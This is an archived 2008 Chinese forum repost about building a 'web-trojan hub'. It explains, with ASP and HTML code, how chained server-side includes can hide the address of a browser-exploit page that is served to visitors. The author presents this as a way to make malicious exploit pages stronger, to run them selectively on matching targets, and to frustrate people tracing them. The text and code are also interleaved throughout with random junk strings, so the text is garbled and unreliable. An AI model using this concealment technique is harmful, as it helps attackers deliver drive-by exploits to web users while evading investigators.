我爱电脑技术论坛 » 网络安全区 » 网马中枢

黑侠 发表于 2008-5-14 08:44

网马中枢

作者：余弦
0l$E"Oc:\7tC"SH5l 来源：0×37 Security et:Z RB,u'OB U*B
#a$Z$G,k8Z)q*b
其实想想就会知道，网马的exp总会有暴露的时刻，也就是说，我的系统环境只要满足条件就可以获得这个网马的exp。通过结合服务端的技术手段，我们可以隐藏网马exp的地址，但是却无法保证这个exp不暴露出来，exp终究要在你的浏览器上执行恶意行为。 PDG!q$K
比如下面code可以隐藏网马exp的地址，却不得不暴露出这个exp：
le(y~.prD'G6E{t %mLM(f9\7Z"v0r
[url]http://127.0.0.1/s_trojan/index.html[/url]的代码：<script src=”[url]http://127.0.0.1/s_trojan/blackbox_0.asp[/url]”></script> #s0M}CI/P*iQ(X|q
bR`['w P
[url]http://127.0.0.1/s_trojan/blackbox_0.asp[/url]的代码：<!– #include file=”blackbox_1.asp” –> W%Kq#J]S

?
?.|2^s)HL [url]http://127.0.0.1/s_trojan/blackbox_1.asp[/url]的代码： *gr$?(bZA

w4EE@[3Dv document.write(’js go here……’) %uuI:`Oz
<% ,V:j S)b GN qq
function xss()
;i8},a |+p
u` response.write “alert(’hello asp.’);” {HA;v}j
end function nJML mF5|1a:Z
xss()
3[5N$p FN4I^ function f(filename)
gtg1btD,a$K set objFSO=Server.CreateObject(”Scripting.FileSystemObject”)
v eK%f5A&O`3BY set objCountFile=objFSO.OpenTextFile(Server.MapPath(filename),1,True)
.x,qM`Q.F r f=objCountFile.readall
i7v'M*`_gW#l:l1n objCountFile.close
#a8?5CM y5lYBGy set objCountFile=nothing 7C6y+d0R)oc^
set objFSO=nothing -l+s)?
A M0b]2T;b
end function
l+h6P7s:Lz?:M x=f(”last_trojan.html”)
q }%N8aC response.write x M Z1S!A P O-} z
%>
#N UIM |k6p trojan() `yD R]
2\8S!_z'U;N+X
最终的网马exp地址为[url]http://127.0.0.1/s_trojan/last_trojan.html[/url]。blackbox_1.asp的代码既要保证服务端正确执行，又要保证客户端能正确执行其最终的JS代码。其实这些中间asp文件会暴露最终的网马exp的内容。但是却不会暴露地址。 $|nlAv!}
I*U?#t3_@(`QS`u7X)l
结合服务端技术其实能做很多事，网马也将更加强大，更容易以服务端为中心而被控制着:-)。强大的网马中枢应该要能判断目标系统的环境而选择性地运行，并有详细的统计功能。这样会给跟踪者带来许多麻烦:-)。但，是不是能真正隐藏网马exp呢？原则上是不行的，因为exp总要输出，否则你的浏览器漏洞如何被触发？

查看完整版本: 网马中枢